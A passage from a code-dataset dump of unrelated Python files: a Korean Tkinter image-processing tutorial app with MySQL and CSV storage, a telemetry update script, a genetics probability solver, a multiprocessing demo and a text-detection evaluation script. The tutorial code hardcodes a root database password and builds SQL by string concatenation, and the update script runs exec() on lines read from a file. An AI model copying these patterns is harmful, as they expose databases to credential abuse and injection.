########\r\n rH, rW, iH, iW = [0] * 4 # 실수위치 및 정수 위치 / real integer\r\n x,y = 0, 0 # 실수와 정수의 차이값\r\n C1,C2,C3,C4 = [0] * 4 # 결정할 위치(N)의 상하좌우 픽셀\r\n for RGB in range(3):\r\n for i in range(outH):\r\n for k in range(outW):\r\n rH = i / value; rW = k / value # 확대하기 때문에 나눠야 함.\r\n iH = int(rH); iW = int(rW) # 나눈 값을 정수로 나타냄.\r\n x = rW - iW; y = rH - iH #\r\n if 0 <= iH < inH-1 and 0 <= iW < inW-1:\r\n C1 = inImage[RGB][iH][iW]\r\n C2 = inImage[RGB][iH][iW + 1]\r\n C3 = inImage[RGB][iH+1][iW+1]\r\n C4 = inImage[RGB][iH+1][iW]\r\n newValue = C1*(1-y)*(1-x) + C2*(1-y)*x + C3*y*x + C4*y*(1-x)\r\n outImage[RGB][i][k] = int(newValue)\r\n displayImageColor()\r\n\r\n\r\n# 히스토그램 -> 영상 그래프를 시각적으로 확인하기 위함.\r\nimport matplotlib.pyplot as plt\r\ndef histoImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n inCountList = [[0] * 256 for _ in range(3)] # 3면이기 때문에 0*256 * 3이 되어야 함.\r\n outCountList = [[0] * 256 for _ in range(3)]\r\n\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n inCountList[RGB][inImage[RGB][i][k]] += 1 # inCountList[0], inCountList[1], inCountList[2] 값을 각각 더해줌.\r\n for i in range(outH):\r\n for k in range(outW):\r\n outCountList[RGB][outImage[RGB][i][k]] += 1\r\n\r\n plt.plot(outCountList[R], 'r-')\r\n plt.plot(outCountList[G], 'g-')\r\n plt.plot(outCountList[B], 'b-')\r\n plt.show()\r\n\r\n#히스토그램 -> matplotlib 사용 없이 진행.\r\ndef histoImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n outCountList = [[0] * 256 for _ in range(3)]\r\n normalCountList = [[0] * 256 for _ in range(3)]\r\n\r\n #빈도수 계산 -> 이어주는 것이 중요. minVal[]을 만들 필요가 없음.\r\n for RGB in range(3):\r\n for i in range(outH):\r\n for k in range(outW):\r\n outCountList[RGB][outImage[RGB][i][k]] += 1\r\n maxVal = max(outCountList[RGB])\r\n minVal = min(outCountList[RGB])\r\n High = 256\r\n # 정규화 = (카운트 값 - 최소값) * High / (최대값 - 최소값)\r\n for i in range(len(outCountList[RGB])):\r\n normalCountList[RGB][i] = (outCountList[RGB][i] - minVal) * High / (maxVal - minVal)\r\n ## 서브 윈도창 생성 후 출력\r\n subWindow = Toplevel(window) # 그래프가 3개 나와야 하므로, subWindow에서 가로는 곱하기 3을 해주고, 세로는 그대로 놔둔다.\r\n subWindow.geometry('%dx%d' %(256*3, 256))\r\n subCanvas = Canvas(subWindow, width=256*3,height = 256)\r\n subPaper = PhotoImage(width = 256*3, height = 256)\r\n subCanvas.create_image((256*3//2, 256//2), image = subPaper, state='normal')\r\n for RGB in range(3):\r\n for i in range(len(normalCountList[RGB])): # 255번 돌아감.\r\n for k in range(int(normalCountList[RGB][i])): # 0 <= normalCountList[i] <= 256\r\n #data = 0 # data=0으로 해준 이유는 검은색만 나오게 하기 위함.\r\n if RGB == R: # RGB 값이 0이면\r\n subPaper.put('#d62719', (256 * RGB + i, 255 -k))\r\n elif RGB == G:\r\n subPaper.put('#4fc34e', (256 * RGB + i, 255 -k ))\r\n elif RGB == B:\r\n subPaper.put('#1948b4', (256 * RGB + i, 255-k))\r\n subCanvas.pack(expand=1, anchor = CENTER)\r\n subWindow.mainloop()\r\n\r\n# 스트레칭 알고리즘\r\ndef stretchImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n for RGB in range(3):\r\n maxVal = minVal = inImage[RGB][0][0]\r\n for i in range(inH):\r\n for k in range(inW):\r\n if inImage[RGB][i][k] < minVal:\r\n minVal = inImage[RGB][i][k]\r\n elif inImage[RGB][i][k] > maxVal:\r\n maxVal = inImage[RGB][i][k]\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = int(((inImage[RGB][i][k] - minVal) / (maxVal - minVal)) * 255)\r\n displayImageColor()\r\n\r\n#End-in image\r\ndef endinImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n minAdd = askinteger(\"최소\", \"최소추가~~>\", minvalue=0, maxvalue=255)\r\n maxAdd = askinteger(\"최대\", \"최소감소~~>\", minvalue=0, maxvalue=255)\r\n\r\n for RGB in range(3):\r\n maxVal = minVal = inImage[RGB][0][0]\r\n for i in range(inH):\r\n for k in range(inW):\r\n if inImage[RGB][i][k] < minVal:\r\n minVal = inImage[RGB][i][k]\r\n elif inImage[RGB][i][k] > maxVal:\r\n maxVal = inImage[RGB][i][k]\r\n minVal += minAdd\r\n maxVal -= maxAdd\r\n for i in range(inH):\r\n for k in range(inW):\r\n value = int((inImage[RGB][i][k] - minVal) / (maxVal - minVal)) * 255\r\n if value <0:\r\n value = 0\r\n elif value >255:\r\n value = 255\r\n outImage[RGB][i][k] = value\r\n displayImageColor()\r\n\r\n# 평활화 - 강사님 방법\r\ndef equalizeImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n for RGB in range(3):\r\n histo = [0] * 256; sumHisto = [0] * 256; normalHisto =[0] * 256 # RGB값이 바뀔 때 마다, 계속 바뀌는 값\r\n # 1. 빈도 수 조사\r\n for i in range(inH):\r\n for k in range(inW):\r\n histo[inImage[RGB][i][k]] += 1\r\n # 2. 누적 히스토그램 생성\r\n sValue = 0\r\n for i in range(len(histo)):\r\n sValue += histo[i] # 누적 값. 계속 합쳐짐.\r\n sumHisto[i] = sValue\r\n # 3. 정규화 누적 히스토그램\r\n for i in range(len(sumHisto)):\r\n normalHisto[i] = int(sumHisto[i] / (inW * inH) * 255)\r\n ## inW * inH는 총 픽셀 수\r\n # 4. 영상처리\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = normalHisto[inImage[RGB][i][k]]\r\n displayImageColor()\r\n\r\n\r\n\r\n## 임시 경로에 outImage를 저장하기.\r\n#-> 이미지를 바로 DB에 넣을 수 없기 때문에 파일로 변환하여 DB에 넣는 과정\r\nimport random\r\nimport struct\r\ndef saveTempImage():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n import tempfile\r\n saveFp = tempfile.gettempdir() + \"/\" + str(random.randint(10000,99999)) + \".jpg\"\r\n ## .jpg 파일이 겹치지 않도록.\r\n if saveFp == '' or saveFp == None:\r\n return\r\n outArray = []\r\n for i in range(outH):\r\n tmpList = []\r\n for k in range(outW):\r\n tup = tuple([outImage[R][i][k], outImage[G][i][k], outImage[B][i][k],])\r\n tmpList.append(tup)\r\n outArray.append(tmpList)\r\n\r\n outArray = np.array(outArray)\r\n savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')\r\n\r\n savePhoto.save(saveFp)\r\n return saveFp\r\n\r\ndef findStat(fname):\r\n # 파일 열고, 읽기.\r\n fsize = os.path.getsize(fname) # 파일의 크기(바이트)\r\n inH = inW = int(math.sqrt(fsize)) # 핵심 코드\r\n ##입력 영상 메모리 확보##\r\n inImage= []\r\n inImage= malloc(inH, inW)\r\n #파일 --> 메모리\r\n with open(fname, 'rb') as rFp:\r\n for i in range(inH):\r\n for k in range(inW):\r\n inImage[i][k] = int(ord(rFp.read(1)))\r\n sum = 0\r\n for i in range(inH):\r\n for k in range(inW):\r\n sum += inImage[i][k]\r\n avg = sum // (inW * inH)\r\n maxVal = minVal = inImage[0][0]\r\n for i in range(inH):\r\n for k in range(inW):\r\n if inImage[i][k] < minVal:\r\n minVal = inImage[i][k]\r\n elif inImage[i][k] > maxVal:\r\n maxVal = inImage[i][k]\r\n return avg, maxVal, minVal\r\n\r\nimport pymysql\r\nIP_ADDR = '192.168.56.110'; USER_NAME = 'root'; USER_PASS = '1234'\r\nDB_NAME = 'BigData_DB'; CHAR_SET = 'utf8'\r\ndef saveMysqlColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n con = pymysql.connect(host=IP_ADDR, user =USER_NAME, password=USER_PASS,\r\n db = DB_NAME, charset=CHAR_SET)\r\n cur = con.cursor()\r\n try:\r\n sql = '''\r\n CREATE TABLE filenameImage_TBL (\r\n filename_id INT AUTO_INCREMENT PRIMARY KEY,\r\n filename_fname VARCHAR(30),\r\n filename_extname CHAR(5),\r\n filename_height SMALLINT, filename_width SMALLINT,\r\n filename_avg TINYINT UNSIGNED,\r\n filename_max TINYINT UNSIGNED, filename_min TINYINT UNSIGNED,\r\n filename_data LONGBLOB);\r\n '''\r\n ## SMALLINT 는 2바이트 / TINYINT는 1바이트 LONGBLOB은 DB에 파일을 저장해놓는 형식\r\n cur.execute(sql)\r\n except:\r\n pass\r\n\r\n ## outImage를 임시 폴더에 저장하고, 이걸 fullname으로 전달.\r\n fullname = saveTempImage()\r\n print(type(fullname))\r\n with open(fullname, 'rb') as rfp:\r\n binData = rfp.read()\r\n\r\n fname, extname = os.path.basename(fullname).split(\".\")\r\n fsize = os.path.getsize(fullname)\r\n height = width = int(math.sqrt(fsize))\r\n avgVal, maxVal, minValue = findStat(fullname) # 평균,최대,최소\r\n sql = \"INSERT INTO filenameImage_TBL(filename_id, filename_fname, filename_extname,\"\r\n sql += \"filename_height, filename_width, filename_avg, filename_max, filename_min, filename_data) \"\r\n sql += \" VALUES(NULL,'\" + fname + \"','\" + extname + \"',\"\r\n sql += str(height) + \",\" + str(width) + \",\"\r\n sql += str(avgVal) + \",\" + str(maxVal) + \",\" + str(minValue)\r\n sql += \", %s )\"\r\n tupleData = (binData,)\r\n cur.execute(sql, tupleData)\r\n con.commit()\r\n cur.close()\r\n con.close()\r\n os.remove(fullname)\r\n print(\"업로드 OK -->\" + fullname)\r\n\r\ndef loadMysqlColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS,\r\n db=DB_NAME, charset=CHAR_SET)\r\n cur = con.cursor()\r\n sql = \"SELECT filename_id, filename_fname, filename_extname, filename_height, filename_width \"\r\n sql += \"FROM filenameImage_TBL\"\r\n cur.execute(sql)\r\n\r\n queryList = cur.fetchall() # 전체 불러오기.\r\n print(queryList)\r\n rowList = [':'.join(map(str,file)) for file in queryList]\r\n import tempfile # C:\\Users\\user\\AppData\\Local\\Temp 로 가도록 하는 라이브러리가 tempfile -> 요기에서 조작.\r\n def selectRecord():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n selIndex = listbox.curselection()[0] # 0, 1, 2 ... 순으로 나온다.\r\n subWindow.destroy() # 선택을 하면 subWindow 창을 닫는다.\r\n filename_id = queryList[selIndex][0]\r\n sql = \"SELECT filename_fname, filename_extname, filename_data FROM filenameImage_TBL \"\r\n sql += \"WHERE filename_id = \" + str(filename_id)\r\n cur.execute(sql) # 이 줄부터 위 두 줄은 이미지에서 필요한 것들만 가져옴.\r\n fname, extname, binData = cur.fetchone()\r\n print()\r\n fullPath = tempfile.gettempdir() + '/' + fname + \".\" + extname # C:\\Users\\user\\AppData\\Local\\Temp/64319.raw 형태로 저장.\r\n with open(fullPath, 'wb') as wfp: # 이 과정을 진행하지 않으면 펜은 있는데 종이는 없는 느낌. with문 과정이 반드시 필요. 후에 뒤에서 삭제를 해줘야 함.\r\n wfp.write(binData) #\r\n cur.close()\r\n con.close()\r\n print(tempfile)\r\n print(fullPath)\r\n\r\n loadImageColor(fullPath) # 메모리에 적재만 되었고 equalImage에서 display가 된다.\r\n equalImageColor()\r\n os.remove(fullPath) # os.remove 를 진행하지 않으면 Appdata 로컬 안에 있는 임시 파일이 계속 쌓이게 되어, 반드시 제거를 해줘야 한다.\r\n\r\n ## 서브 윈도에 목록 출력하기\r\n subWindow = Toplevel(window)\r\n listbox = Listbox(subWindow)\r\n button = Button(subWindow, text=\"선택\", command = selectRecord)\r\n\r\n for rowStr in rowList:\r\n listbox.insert(END, rowStr)\r\n\r\n listbox.pack(expand = 1, anchor = CENTER)\r\n button.pack()\r\n subWindow.mainloop()\r\n\r\n# 파일을 메로리로 로딩하는 함수\r\ndef loadCSV(fname):\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n fsize = 0\r\n fp = open(fname, 'r')\r\n for _ in fp:\r\n fsize += 1\r\n inH = inW = int(math.sqrt(fsize)) # 핵심 코드\r\n fp.close()\r\n ## 입력영상 메모리 확보 ##\r\n inImage = []\r\n for _ in range(3):\r\n inImage.append(malloc(inH, inW)) # 면을 3개 만든다.\r\n #파일 --> 메모리\r\n with open(fname, 'r') as rFp:\r\n for row_list in rFp:\r\n row, col, rValue, gValue, bValue = list(map(int, row_list.strip().split(\",\")))\r\n inImage[R][row][col] = rValue\r\n inImage[G][row][col] = gValue\r\n inImage[B][row][col] = bValue\r\n\r\ndef openCSVColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n filename = askopenfilename(parent = window,\r\n filetypes=((\"CSV 파일\", \"*.csv\"), (\"모든 파일\", \"*.*\")))\r\n if filename == '' or filename == None:\r\n return\r\n loadCSV(filename)\r\n equalImageColor()\r\n\r\nimport csv\r\ndef saveCSVColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n saveFp = asksaveasfile(parent=window, mode='wb',\r\n defaultextension='*.csv', filetypes=((\"CSV 파일\", \"*.csv\"), (\"모든 파일\", \"*.*\")))\r\n if saveFp == \"\" or saveFp == None:\r\n return\r\n with open(saveFp.name, 'w', newline='') as wFp:\r\n csvWriter = csv.writer(wFp)\r\n for i in range(outH):\r\n for k in range(outW):\r\n row_list = [i, k, outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]]\r\n csvWriter.writerow(row_list)\r\n print(\"CSV.save OK~\")\r\n\r\nimport xlwt\r\ndef saveExcelColor():\r\n pass\r\n\r\n####################\r\n#### 전역변수 선언부 ####\r\n####################\r\nR, G, B = 0, 1, 2\r\ninImage, outImage = [], [] # 3차원 리스트(배열)\r\ninH, inW, outH, outW = [0] * 4\r\nwindow, canvas, paper = None, None, None\r\nfilename = \"\"\r\nVIEW_X, VIEW_Y = 512, 512 # 화면에 보일 크기 (출력용)\r\n####################\r\n#### 메인 코드부 ####\r\n####################\r\nwindow = Tk()\r\nwindow.geometry(\"500x500\")\r\nwindow.title(\"컴퓨터 비전(딥러닝-칼라) ver 0.1\")\r\n\r\nstatus = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\n## 마우스 ��벤트\r\n\r\nmainMenu = Menu(window)\r\nwindow.config(menu=mainMenu)\r\n\r\nfileMenu = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"파일\", menu=fileMenu)\r\nfileMenu.add_command(label=\"파일 열기\", command=openImageColor)\r\nfileMenu.add_separator()\r\nfileMenu.add_command(label=\"파일 저장\", command=saveImageColor)\r\n\r\ncomVisionMenu1 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"화소점 처리\", menu=comVisionMenu1)\r\ncomVisionMenu1.add_command(label=\"덧셈/뺄셈\", command=addImageColor)\r\ncomVisionMenu1.add_command(label=\"반전하기\", command=revImageColor)\r\ncomVisionMenu1.add_command(label=\"파라볼라\", command=paraImageColor)\r\ncomVisionMenu1.add_separator()\r\ncomVisionMenu1.add_command(label=\"모핑\", command=morphImageColor)\r\ncomVisionMenu1.add_separator()\r\ncomVisionMenu1.add_command(label=\"채도조절(Pillow)\", command=addSValuePillow)\r\ncomVisionMenu1.add_command(label=\"채도조절(HSV)\", command=addSValueHSV)\r\n\r\ncomVisionMenu2 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"통계\", menu=comVisionMenu2)\r\ncomVisionMenu2.add_command(label=\"이진화\", command=bwImageColor)\r\ncomVisionMenu2.add_command(label=\"축소(평균변환)\", command=zoomOutImage2Color)\r\ncomVisionMenu2.add_command(label=\"확대(양선형보간)\", command=zoomInImage2Color)\r\ncomVisionMenu2.add_separator()\r\ncomVisionMenu2.add_command(label=\"히스토그램\", command=histoImageColor)\r\ncomVisionMenu2.add_command(label=\"히스토그램(내꺼)\", command=histoImage2Color)\r\ncomVisionMenu2.add_command(label=\"명암대비\", command=stretchImageColor)\r\ncomVisionMenu2.add_command(label=\"End-In탐색\", command=endinImageColor)\r\ncomVisionMenu2.add_command(label=\"평활화\", command=equalizeImageColor)\r\n\r\ncomVisionMenu3 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"기하학 처리\", menu=comVisionMenu3)\r\ncomVisionMenu3.add_command(label=\"상하반전\", command=upDownImageColor)\r\ncomVisionMenu3.add_command(label=\"이동\", command=moveImageColor)\r\ncomVisionMenu3.add_command(label=\"축소\", command=zoomOutImageColor)\r\ncomVisionMenu3.add_command(label=\"확대\", command=zoomInImageColor)\r\ncomVisionMenu3.add_command(label=\"회전1\", command=rotateImageColor)\r\ncomVisionMenu3.add_command(label=\"회전2(중심,역방향)\", command=rotateImage2Color)\r\n\r\ncomVisionMenu4 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"화소영역 처리\", menu=comVisionMenu4)\r\ncomVisionMenu4.add_command(label=\"엠보싱(RGB)\", command=embossImageRGB)\r\ncomVisionMenu4.add_command(label=\"엠보싱(Pillow제공)\", command=embossImagePillow)\r\ncomVisionMenu4.add_command(label=\"엠보싱(HSV)\", command=embossImageHSV)\r\ncomVisionMenu4.add_separator()\r\ncomVisionMenu4.add_command(label=\"블러링(RGB)\", command=blurrImageRGB)\r\n\r\ncomVisionMenu5 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"기타 입출력\", menu=comVisionMenu5)\r\ncomVisionMenu5.add_command(label=\"MySQL에서 불러오기\", command=loadMysqlColor)\r\ncomVisionMenu5.add_command(label=\"MySQL에 저장하기\", command=saveMysqlColor)\r\ncomVisionMenu5.add_separator()\r\ncomVisionMenu5.add_command(label=\"CSV 열기\", command=openCSVColor)\r\ncomVisionMenu5.add_command(label=\"CSV로 저장\", command=saveCSVColor)\r\ncomVisionMenu5.add_separator()\r\n# comVisionMenu5.add_command(label=\"엑셀 열기\", command=openExcel)\r\ncomVisionMenu5.add_command(label=\"엑셀로 저장\", command=saveExcelColor)\r\n# comVisionMenu5.add_command(label=\"엑셀 아트로 저장\", command=saveExcelArt)\r\n\r\nwindow.mainloop()","sub_path":"강의자료/2019-06-21/Code13-Mission1- Code13-01에서 시작, Code10-05 기반.py","file_name":"Code13-Mission1- Code13-01에서 시작, Code10-05 기반.py","file_ext":"py","file_size_in_byte":49900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"573787601","text":"#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python\n\n#################################################################################\n# #\n# update_rdb.py: update dataseeker rdb files for ccdm, pacd, mups, and elbi #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last update: Mar 04, 2021 #\n# #\n#################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport random\nimport operator\nimport math\nimport time\n\npath = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n\nsys.path.append(bin_dir)\nsys.path.append(mta_dir)\n#\n#--- import several functions\n#\nimport pcadfilter\nimport ccdmfilter\nimport maverage\nimport mta_common_functions as mcf\n#\n#--- temp writing file name\n#\nrtail = int(time.time()*random.random())\nzspace = '/tmp/zspace' + str(rtail)\n\n#-----------------------------------------------------------------------------------\n#-- run_rdb_updates: update dataseeker rdb files of ccdm, pacad, mups, and elbilow -\n#-----------------------------------------------------------------------------------\n\ndef run_rdb_updates():\n \"\"\"\n update dataseeker rdb files of ccdm, pacad, mups, and elbilow\n input: none but read from the current trace log files\n output: updated rdb files of ccdm, pacad, mups, and elbilow\n \"\"\"\n#\n#--- read the already processed data list\n#\n pfile = house_keeping + 'rdb_processed_list'\n pdata = mcf.read_data_file(pfile)\n#\n#--- read the currently available data list\n#\n cmd = 'ls ' + main_dir + '/*.tl > ' + zspace\n os.system(cmd)\n\n cdata = mcf.read_data_file(zspace, remove=1)\n#\n#--- find new data\n#\n ndata = list(set(cdata) - set(pdata))\n#\n#--- if there is no new data, exit\n#\n if len(ndata) == 0:\n exit(1)\n#\n#--- make lists for ccdm, pcad, mups...\n#--- also update already processed data list\n#\n fo = open(pfile, 'w')\n fc = open('./ccdmlist', 'w')\n fp = open('./pcadlist', 'w')\n fm = open('./mupslist1', 'w')\n fn = open('./mupslist2', 'w')\n fe = open('./elbilist', 'w')\n\n for ent in ndata:\n fo.write(ent + '\\n')\n\n if make_select_list(fc, ent, 'CCDM'):\n continue\n\n if make_select_list(fp, ent, 'PCAD'):\n continue\n\n if make_select_list(fm, ent, 'MUPSMUPS1'):\n continue\n\n if make_select_list(fn, ent, 'MUPSMUPS2'):\n continue\n\n if make_select_list(fe, ent, 'ELBILOW'):\n continue\n\n fo.close()\n fc.close()\n fp.close()\n fm.close()\n fn.close()\n fe.close()\n#\n#--- run pcad update\n#\n pcadfilter.pcadfilter('./pcadlist')\n#\n#--- run ccdm update\n#\n ccdmfilter.ccdmfilter('./ccdmlist')\n#\n#--- run mups1 udpate; mups2 update will be done separately\n#\n maverage.maverage('mupslist1', 'mups_1.rdb')\n maverage.maverage('mupslist2', 'mups_2.rdb')\n#\n#---- run elbi_low update\n#\n maverage.maverage('elbilist', 'elbi_low.rdb')\n elbi_file = ds_dir + 'elbi_low.rdb'\n maverage.filtersort(elbi_file)\n#\n#--- clean up \n#\n mcf.rm_files('./ccdmlist')\n mcf.rm_files('./pcadlist')\n mcf.rm_files('./mupslist1')\n mcf.rm_files('./mupslist2')\n mcf.rm_files('./elbilist')\n\n#---------------------------------------------------------------------------\n#-- make_select_list: write a line if the line contain \"word\" ---\n#---------------------------------------------------------------------------\n\ndef make_select_list(f, line, word):\n \"\"\"\n write a line if the line contain \"word\"\n input: f --- file indicator\n line --- a line to check and add\n word --- a word to check whether it is in the line\n output: updated file\n return True/False\n \"\"\"\n mc = re.search(word, line)\n if mc is not None:\n line = line.strip()\n f.write(line)\n f.write('\\n')\n\n return True\n else:\n return False \n\n#---------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n\n run_rdb_updates()\n","sub_path":"Dump/update_rdb.py","file_name":"update_rdb.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273964308","text":"# ROSALIND TASK 10: Mendel's First Law\n\n\ndef genotype_random_mating(population_structure):\n \"\"\"\n This function takes a list as input argument and list must have only three elements:\n number of homozygous dominants , number of heterozygous , number of homozygous recessive\n Function returns a dictionary of double diploid genotypes of mating parents as key\n and probality of such random mating as value.\n \"\"\"\n pop_size = float(sum(population_structure))\n mating_odds = []\n genotypes = ['AAAA', 'AAAa', 'AAaa', 'AaAa', 'AaAA', 'Aaaa', 'aaaa', 'aaAA', 'aaAa']\n for i in range(len(population_structure)):\n mating_odds.append((population_structure[i]/pop_size)*((population_structure[i]-1)/(pop_size-1)))\n temp_pop_structure = list(population_structure)\n del temp_pop_structure[i]\n for pop in temp_pop_structure:\n mating_odds.append((population_structure[i]/pop_size)*(pop/(pop_size-1)))\n return dict(zip(genotypes, mating_odds))\n\n\ndef chances_dominant_progeny(genotype_dict):\n \"\"\"\n This function takes input of form returned by function genotype_random_mating()\n It returns a float value of probability of dominant phenotype offspring.\n \"\"\"\n return round(genotype_dict['AAAA'] + genotype_dict['AAAa'] + genotype_dict['AAaa'] +\n genotype_dict['AaAA'] + ((3*genotype_dict['AaAa'])/4.0) + (genotype_dict['Aaaa']/2.0) +\n genotype_dict['aaAA'] + (genotype_dict['aaAa']/2.0), 5)\n\npopulation_structure = [20, 24, 19]\nchances_dominant_progeny(genotype_random_mating(population_structure))\n\n","sub_path":"probability_dom_progeny.py","file_name":"probability_dom_progeny.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342067122","text":"from multiprocessing import Pool\nimport random\nimport os\nimport time\n\n\ndef p1():\n print(\"A\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n time.sleep(0.1)\n #time.sleep(random.random()*3)\n end = time.time()\n print(\"task A runs %0.2f seconds.\" % (end-start))\n return \"return A\"\n\ndef p2():\n print(\"B\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n #time.sleep(random.random()*3)\n time.sleep(0.3)\n end = time.time()\n print(\"task B runs %0.2f seconds.\" % (end-start))\n return \"return B\"\n\ndef p3():\n print(\"C\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n #time.sleep(random.random()*3)\n time.sleep(0.2)\n end = time.time()\n print(\"task C runs %0.2f seconds.\" % (end-start))\n return \"return C\"\n\n\nif __name__ == \"__main__\":\n # 1. Pool.apply_async多进程\n print(\"1. 多进程\")\n begin = time.time()\n pool = Pool(2) \n p = [p1, p2, p3]\n results = []\n for h in p:\n results.append(pool.apply_async(h, args=()))\n pool.close()\n pool.join()\n for res in results:\n print(res.get())\n print(\"Done.\")\n print(\"Total time\", time.time() - begin)\n\n # 2. Pool.apply单进程\n print(\"2. 单进程\")\n begin = time.time()\n pool = Pool(2) \n p = [p1, p2, p3]\n results = []\n for h in p:\n results.append(pool.apply(h, args=()))\n pool.close()\n pool.join()\n for res in results:\n print(res)\n print(\"Total time\", time.time() - begin)\n\n # 3.示例\n print(\"3. 示例\")\n pool = Pool(4) \n multiple_results = [pool.apply_async(os.getpid, ()) for i in range(4)]\n pool.close()\n pool.join()\n print([res.get(timeout=1) for res in multiple_results])\n\n\n","sub_path":"tools/py_process_thread/mp/Pool_apply_vs_apply_async.py","file_name":"Pool_apply_vs_apply_async.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"432293006","text":"import argparse\n\nimport time\nimport torch\nimport subprocess\nimport os\nfrom model import EAST\nfrom detect import detect_dataset\nimport numpy as np\nimport shutil\n\nfrom utils import resolve_checkpoint_path\n\n\ndef eval_model(model, checkpoint, test_path, submit_path, save_flag=True):\n test_img_path = os.path.join(test_path, 'images')\n test_gt_path = os.path.join(test_path, 'gt')\n\n proc_dir = os.getcwd()\n\n if os.path.exists(submit_path):\n shutil.rmtree(submit_path)\n os.mkdir(submit_path)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model.to(device)\n model.load_state_dict(torch.load(checkpoint)['model'])\n model.eval()\n\n start_time = time.time()\n detect_dataset(model, device, test_img_path, submit_path)\n os.chdir(submit_path)\n res = subprocess.getoutput('zip -q submit.zip *.txt')\n #print(res)\n shutil.move('submit.zip', '../submit.zip')\n os.chdir(test_gt_path)\n res = subprocess.getoutput('zip -q gt.zip *.txt')\n shutil.move('gt.zip', os.path.join(proc_dir, 'gt.zip'))\n # res = subprocess.getoutput('mv submit.zip ../')\n os.chdir(proc_dir)\n res = subprocess.getoutput('python ./evaluate/script.py –g=./gt.zip –s=./submit.zip')\n print(res)\n os.remove('./submit.zip')\n #print('eval time is {}'.format(time.time()-start_time))\n\n if not save_flag:\n shutil.rmtree(submit_path)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='EAST Evaluation')\n parser.add_argument('--model', type=str, required=True,\n help='Path to the model checkpoint')\n parser.add_argument('--dataset', type=str, default='/home/dcg-adlr-mranzinger-data.cosmos1100/scene-text/icdar/incidental_text/val',\n help='Path to the images to test against')\n\n args = parser.parse_args()\n\n model = EAST(False)\n\n #model_name = './pths/east_vgg16.pth'\n model_name = resolve_checkpoint_path(args.model, load_best=True)\n\n print(f'Using checkpoint: {model_name}')\n\n #test_img_path = os.path.abspath('../ICDAR_2015/test_img')\n submit_path = './submit'\n eval_model(model, model_name, args.dataset, submit_path)\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409920788","text":"import os\nimport boto3\nimport re\nimport time\nimport utils\nfrom botocore.config import Config\n\nlogger = utils.get_logger()\n\nclass S3:\n\n def __init__(self, aws, region = None):\n\n self.aws = aws\n config = Config(retries = dict(max_attempts = 20))\n if region is not None:\n self.resource = boto3.resource('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config, region_name = region)\n self.client = 